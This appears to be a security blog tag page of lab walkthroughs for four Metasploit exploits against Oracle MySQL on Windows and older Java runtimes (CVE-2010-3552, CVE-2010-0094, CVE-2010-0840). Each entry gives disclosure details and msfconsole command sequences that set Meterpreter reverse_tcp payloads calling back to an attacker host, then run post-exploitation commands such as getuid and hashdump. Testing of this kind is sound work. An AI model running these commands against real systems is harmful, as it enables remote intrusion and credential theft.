Tag Archives: Oracle

Oracle MySQL UDF for Microsoft Windows Metasploit Payload Execution

Timeline :

The vulnerability seem to exist since 2007 !
Vulnerability discovered and disclosed by Bernardo Damele the 2009-01-16
Metasploit PoC provided by todb the 2011-03-08

PoC provided by :

Bernardo Damele
todb

Reference(s) :

NONE

Affected version(s) :

All Microsoft Windows MySQL, how support UDF, due to the fact that default MySQL installation is done with SYSTEM privileges.

Tested on Windows XP SP3 with :

MySQL Community 5.5.9

Description :

This module creates and enables a custom UDF (user defined function) on the target host via the SELECT … into DUMPFILE method of binary injection. On default Microsoft Windows installations of MySQL (=< 5.5.9), directory write permissions not enforced, and the MySQL service runs as LocalSystem. NOTE: This module will leave a payload executable on the target system when the attack is finished, as well as the UDF DLL, and will define or redefine sys_eval() and sys_exec() functions.

To exploit this weakness, the MySQL targeted user should have the following global privileges :

grant select,insert,file, create routine,alter routine,execute on *.* to test3@’%’ identified by ‘test3’;

Commands :

use exploit/windows/mysql/mysql_payload
set RHOST 192.168.178.41
set USERNAME test3
set PASSWORD test3

set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

getuid
hashdump

CVE-2010-3552 : Oracle Java Runtime New Plugin docbase Buffer Overflow

Timeline :

Vulnerability discovered by Stephen Fewer and submitted to ZDI
Vulnerability reported to the vendor by ZDI the 2010-07-20
PoC provided by berendjanwever the 2010-08-31
Coordinated vulnerability disclosure the 2010-10-12
Metasploit PoC provided the 2010-10-25

PoC provided by :

jduck

Reference(s) :

CVE-2010-3552
ZDI-10-206

Affected version(s) :

All Oracle JRE versions previous version 6 update 22.

Tested on Windows XP SP3 with

Oracle JRE 6 Update 20

Description :

This module exploits a flaw in the new plugin component of the Sun Java Runtime Environment before v6 Update 22. By specifying specific parameters to the new plugin, an attacker can cause a stack-based buffer overflow and execute arbitrary code. When the new plugin is invoked with a “launchjnlp” parameter, it will copy the contents of the “docbase” parameter to a stack-buffer using the “sprintf” function. A string of 396 bytes is enough to overflow the 256 byte stack buffer and overwrite some local variables as well as the saved return address. NOTE: The string being copied is first passed through the “WideCharToMultiByte”. Due to this, only characters which have a valid localized multibyte representation are allowed. Invalid characters will be replaced with question marks (‘?’). This vulnerability was originally discovered independently by both Stephen Fewer and Berend Jan Wever (SkyLined). Although exhaustive testing hasn’t been done, all versions since version 6 Update 10 are believed to be affected by this vulnerability. This vulnerability was patched as part of the October 2010 Oracle Patch release.

Commands :

use exploit/windows/browser/java_docbase_bof
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
sysinfo
getuid
ipconfig

CVE-2010-0094 : Java RMIConnectionImpl Deserialization Privilege Escalation Exploit

Timeline :

Vulnerability reported to Oracle by ZDI the 2009-10-21
Coordinated public release of advisory the 2010-04-05
Metasploit PoC provided by hdm the 2010-09-08

    PoC provided by :

Sami Koivu
Matthias Kaiser
egypt

    Reference(s) :

CVE-2010-0094
ZDI-10-051

    Affected version(s) :

Java 6 Standard Edition prior to update 19
Java 5 Standard Edition prior to update 23

    Tested on Windows XP SP3 with :

    Java 6 Standard Edition Update 18

    Description :

This module exploits a vulnerability in the Java Runtime Environment that allows to deserialize a MarshalledObject containing a custom classloader under a privileged context. The vulnerability affects version 6 prior to update 19 and version 5 prior to update 23.

    Commands :

use multi/browser/java_rmi_connection_impl
set SRVHOST 192.168.178.21
set PAYLOAD java/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
sysinfo
getuid
ipconfig

CVE-2010-0840 : Java Statement.invoke Trusted Method Chain Exploit

Timeline :

Vulnerability reported to Oracle by ZDI the 2009-11-24
Coordinated public release of advisory the 2010-04-05
Metasploit PoC provided by hdm the 2010-08-20

    PoC provided by :

Sami Koivu
Matthias Kaiser
egypt

    Reference(s) :

CVE-2010-0840
ZDI-10-056

    Affected version(s) :

Java 6 Standard Edition prior to update 19
Java 5 Standard Edition prior to update 23

    Tested on Windows XP SP3 with :

    Java 6 Standard Edition Update 18

    Description :

This module exploits a vulnerability in Java Runtime Environment that allows an untrusted method to run in a privileged context. The vulnerability affects version 6 prior to update 19 and version 5 prior to update 23.

    Commands :

use multi/browser/java_trusted_chain
set SRVHOST 192.168.178.21
set PAYLOAD java/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
sysinfo
getuid
ipconfig